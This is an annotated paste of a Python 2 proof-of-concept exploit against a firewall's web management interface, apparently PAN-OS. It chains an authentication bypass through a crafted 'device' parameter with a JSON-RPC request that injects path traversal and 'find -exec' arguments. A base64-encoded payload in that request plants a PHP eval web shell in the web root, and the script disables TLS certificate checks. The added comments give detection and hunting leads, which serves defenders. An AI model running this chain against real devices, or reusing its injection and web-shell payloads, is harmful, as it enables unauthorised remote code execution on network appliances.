
panos-rce-poc-v1.py

a guest
Mar 13th, 2018
  # Proof-of-concept script (Python 2: urllib2, print statements) that chains
  # three HTTPS requests against a device's web management interface; the
  # paste title suggests PAN-OS, but the page names no advisory or version.
  # The comments describe what each request looks like on the wire and what
  # it leaves on disk, so the sequence can be recognised in logs.
  #
  # Observable sequence, in order:
  #   1. GET /esp/cms_changeDeviceContext.esp, sent without any cookie, with
  #      quote, semicolon and pipe characters in the `device` parameter;
  #   2. GET /php/utils/debug.php carrying the PHPSESSID returned by step 1;
  #   3. POST /php/utils/router.php/Administrator.get whose JSON `id` field
  #      carries injected XML attributes and `-print -exec` arguments.
  # Mitigation lies outside this script: keep the management interface off
  # untrusted networks and run a release in which the vendor has fixed these
  # endpoints.
  1. import urllib
  2. import urllib2
  3. import ssl  
  4. import sys
  5.  
  # Replaces the process-wide default HTTPS context factory with the
  # unverified one: no certificate or hostname validation happens on any
  # urlopen() call below.
  6. ssl._create_default_https_context = ssl._create_unverified_context
  7.  
  # Hard-coded target; a private (RFC 1918) address as written.
  8. domain = "192.168.1.1"
  9.  
  # Step 1. The `device` value contains a single quote, a double quote and the
  # suffix `;user|s:`, which resembles PHP session-record syntax. Presumably
  # the server stores it unsanitised in the session it creates; that cannot be
  # confirmed from this script alone. Detection: requests to this path whose
  # `device` parameter is not a plain identifier.
  10. #pass auth
  11. print "step 1: pass_auth"
  12. pass_auth_url = "https://" + domain + "/esp/cms_changeDeviceContext.esp?device=1024:bbbb'\";user|s:"
  13. print "pass_auth request:    " + pass_auth_url
  14. request = urllib2.Request(pass_auth_url)
  15. response = urllib2.urlopen(request)
  16. print "pass_auth respone:    " + response.read()
  # The script only proceeds if the response set a PHPSESSID cookie; it then
  # keeps the `PHPSESSID=<value>` pair up to the first ';' and replays it on
  # the following requests.
  17. session_start_index = response.headers['Set-Cookie'].find("PHPSESSID")
  18. if session_start_index == -1:
  19.     print "pass_auth fail!!"
  20.     sys.exit()
  21. session = response.headers['Set-Cookie'][session_start_index:]
  22. session = session[:session.find(';')]
  23. auth_headers = {
  24.  'Cookie':session,
  25.  'Connection':'keep-alive'
  26. }
  27.  
  28.  
  # Step 2. Checks whether the session from step 1 is treated as logged in:
  # debug.php is fetched with that cookie and the body must contain "Debug".
  # Detection: a debug.php hit from a session with no preceding login request
  # in the web log.
  29. print "\n"
  30. print "step 2: check if pass auth"
  31. auth_url = "https://" + domain + "/php/utils/debug.php"
  32. print "auth_url request:    " + auth_url
  33. request = urllib2.Request(auth_url, headers = auth_headers)
  34. response = urllib2.urlopen(request)
  35. content = response.read()
  36. #print content
  37. if "Debug" not in content:
  38.     print "pass auth fail!!"
  39.     sys.exit()
  40. print "pass auth success!!"
  41.  
  42.  
  # Step 3. The console label says "create dir", but the request is a JSON-RPC
  # call (action PanDirect, method execute, target Administrator.get). The
  # `id` string closes the quoted value it sits in and appends the attributes
  # async-mode, refresh and cookie. The cookie value combines a ../ traversal
  # into /opt/pancfg/mgmt/logdb/traffic/1/ with `-print -exec python -c ...`
  # arguments, and the string ends with a \u0000 escape.
  # NOTE(review): presumably the cookie value ends up as a file name in that
  # directory and is later expanded on a command line; the script itself does
  # not show this.
  # The base64 blob decodes to a short Python snippet that writes a one-line
  # PHP eval web shell to /var/appweb/htdocs/poc.php (it reads its code from
  # the POST field `jbfcwashere`). Hunting leads: unexpected .php files in
  # that web root, file names containing spaces or `-exec` under the traffic
  # log directory, and POSTs to router.php whose `id` contains quotes or '/>'.
  43. print "\n"
  44. print "setp 3: create dir"
  45. create_dir_url = "https://" + domain + "/php/utils/router.php/Administrator.get"
  46. print "create_dir request:    " + create_dir_url
  47. post_data = "{\"action\":\"PanDirect\",\"method\":\"execute\",\"data\":[\"07c5807d0d927dcd0980f86024e5208b\",\"Administrator.get\",{\"changeMyPassword\":true,\"template\":\"asd\",\"id\":\"admin']\\\" async-mode='yes' refresh='yes' cookie='../../../../../../opt/pancfg/mgmt/logdb/traffic/1/* -print -exec python -c exec(\\\"Zj1vcGVuKCcvdmFyL2FwcHdlYi9odGRvY3MvcG9jLnBocCcsICd3Jyk7Zi53cml0ZSgiPD9waHAgQGV2YWwoJF9QT1NUWydqYmZjd2FzaGVyZSddKTs/PiIpO2YuY2xvc2UoKTs=\\\".decode(\\\"base64\\\")) ;'/>\\u0000\"}],\"type\":\"rpc\",\"tid\":713}"
  48. request = urllib2.Request(create_dir_url, headers = auth_headers, data=post_data)
  49. response = urllib2.urlopen(request)
  50.  
  # The response to step 3 is never inspected. The "15 minutes" wording
  # suggests the injected arguments are picked up by a periodic job rather
  # than run immediately (an inference; nothing in this script shows it).
  # NOTE(review): the path printed below (/vudrc.php) differs from the file
  # name inside the encoded payload (poc.php); when reviewing web logs,
  # search for both.
  51. print "\n"
  52. print "15 minutes later, visit https://" + domain + "/vudrc.php"